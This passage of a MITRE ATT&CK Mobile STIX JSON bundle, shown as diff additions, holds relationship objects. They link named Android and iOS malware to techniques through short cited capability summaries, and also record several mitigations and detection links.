"relationship--5088a10e-03d2-4643-8df8-b7b601c2cc24", + "type": "relationship", + "created": "2020-01-27T17:05:58.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.267Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can track the device’s location.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85", + "type": "relationship", + "created": "2020-11-20T16:37:28.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.547Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect various pieces of device information, such as serial number and product information.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4f6f4def-e76d-4d1b-9416-b6543e7dbc54", + "type": "relationship", + "created": "2021-10-01T14:42:48.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.744Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can record audio.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8a55c28d-9cdd-4b6f-91e7-bcb3b05f6724", + "created": "2022-04-01T15:02:21.344Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken devices. ", + "modified": "2022-04-01T15:02:21.344Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f9de9819-b131-459e-948b-bdf3fe6f1ef0", + "type": "relationship", + "created": "2020-12-24T21:55:56.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.686Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed common system information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ff3aa49b-c054-44ec-89da-6c67d4995193", + "created": "2023-03-20T18:44:44.257Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:44.257Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--919a13bc-74be-4660-af63-454abee92635", + "type": "relationship", + "created": "2019-03-11T15:13:40.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Karl Dominguez. (2011, September 27). ANDROIDOS_ANSERVER.A. Retrieved November 30, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ANDROIDOS_ANSERVER.A", + "source_name": "TrendMicro-Anserver2" + } + ], + "modified": "2019-08-05T20:05:25.571Z", + "description": "\n[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) gathers the device IMEI and IMSI.(Citation: TrendMicro-Anserver2)", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83d95d05-7545-4295-894b-f33a2ba1063b", + "created": "2020-12-17T20:15:22.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:47:45.408Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has registered several broadcast receivers.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c50e9e7-e13c-4814-98d0-088d73b10005", + "created": "2023-03-03T16:21:24.531Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:21:24.531Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has modified Safari’s default search engine, bookmarked websites, opened pages, and accessed contacts and authorization tokens of the IM program “QQ” on infected devices.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f517a7ce-dfdc-4f42-84c1-fef136e2ea19", + "created": "2020-09-24T15:26:15.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:01.468Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) has exfiltrated data using HTTP requests.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26b1025b-5c08-4b6e-8c50-7d2baf29e7b7", + "created": "2022-04-01T18:45:11.299Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent versions of Android modified how device administrator applications are uninstalled, making it easier for the user to remove them.", + "modified": "2022-04-01T18:45:11.299Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--78cc0d6d-6347-45a4-a18c-ca76150aa7a9", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[BrainTest](https://attack.mitre.org/software/S0293) stores a secondary Android app package (APK) in its assets directory in encrypted form, and decrypts the payload at runtime.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c7f876d4-99f2-41ac-993c-57a3f2b4e0eb", + "created": "2023-02-06T19:00:42.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:22:43.518Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can access a device's location.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2", + "type": "relationship", + "created": "2020-09-15T15:18:12.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.398Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device networking information, including phone number, IMEI, and IMSI.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ded1b79-cf7c-435d-b6ed-2c8872f9393f", + "type": "relationship", + "created": "2020-12-24T22:04:28.005Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.005Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has taken photos with the device camera.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--31330d32-50c8-4499-91fb-e1dcffa9ea8f", + "created": "2022-03-30T18:14:04.881Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Symantec-iOSProfile2", + "url": "https://www.symantec.com/connect/blogs/apple-ios-103-finally-battles-malicious-profiles", + "description": "Brian Duckering. (2017, March 27). Apple iOS 10.3 Finally Battles Malicious Profiles. Retrieved September 24, 2018." + }, + { + "source_name": "Android-TrustedCA", + "url": "https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html", + "description": "Chad Brubaker. (2016, July 7). Changes to Trusted Certificate Authorities in Android Nougat. Retrieved September 24, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile OSes have implemented measures to make it more difficult to trick users into installing untrusted certificates and configurations. iOS 10.3 and higher add an additional step for users to install new trusted CA certificates and configuration profiles. On Android, apps that target compatibility with Android 7 and higher (API Level 24) default to only trusting CA certificates that are bundled with the operating system, not CA certificates that are added by the user or administrator, hence decreasing their susceptibility to successful adversary-in-the-middle attack.(Citation: Symantec-iOSProfile2)(Citation: Android-TrustedCA)", + "modified": "2022-03-30T18:14:04.881Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce5f506a-8fc9-40a2-a78e-96796c896f1b", + "created": "2023-03-20T15:56:47.307Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:47.307Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--40f30137-4db9-4596-b4c7-a12f1497fd92", + "created": "2020-11-10T17:08:35.831Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has performed rudimentary SSL certificate validation to verify C2 server authenticity before establishing a SSL connection.(Citation: Lookout Uyghur Campaign)", + "modified": "2022-04-18T16:02:42.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb1eeb37-37a8-47b6-aff8-9703735a4d93", + "type": "relationship", + "created": "2020-09-11T15:50:18.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.937Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can send SMS messages.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--496976ef-4a0c-4782-95e7-231bd44df162", + "type": "relationship", + "created": "2020-12-14T15:02:35.295Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.295Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect various pieces of device information, including device model and OS version.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--85c7e956-3ce5-4495-b52e-385ae2ee4f9b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "modified": "2019-10-09T14:51:42.845Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine, Russia, or Belarus.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca8c38e6-8343-4f5e-929d-2759a0d49d59", + "created": "2020-11-24T18:18:33.743Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) has used web injects to capture users’ credentials.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-15T17:39:22.154Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8d71e646-74d1-4d62-8989-2ad4ddf7a67b", + "created": "2023-02-06T19:47:08.535Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:13:44.210Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has code to encrypt device data with AES.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c90bfd4c-3c7e-4528-b5f6-574ef29ecdc9", + "created": "2022-03-28T19:32:05.234Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers should be cautious when selecting third-party libraries to integrate into their application.", + "modified": "2022-03-28T19:32:05.234Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9c5deb9-30d4-4bc3-98ca-6089d4b74b1e", + "type": "relationship", + "created": "2020-12-24T21:55:56.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.745Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the list of installed apps.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1fac829-275a-409a-9060-e7bd7c63057e", + "type": "relationship", + "created": "2020-12-18T20:14:47.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.375Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can obtain a list of installed apps.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0d305e1e-df8f-4028-bf6f-1d7fed9e6184", + "created": "2022-03-30T17:53:56.805Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T17:53:56.805Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", 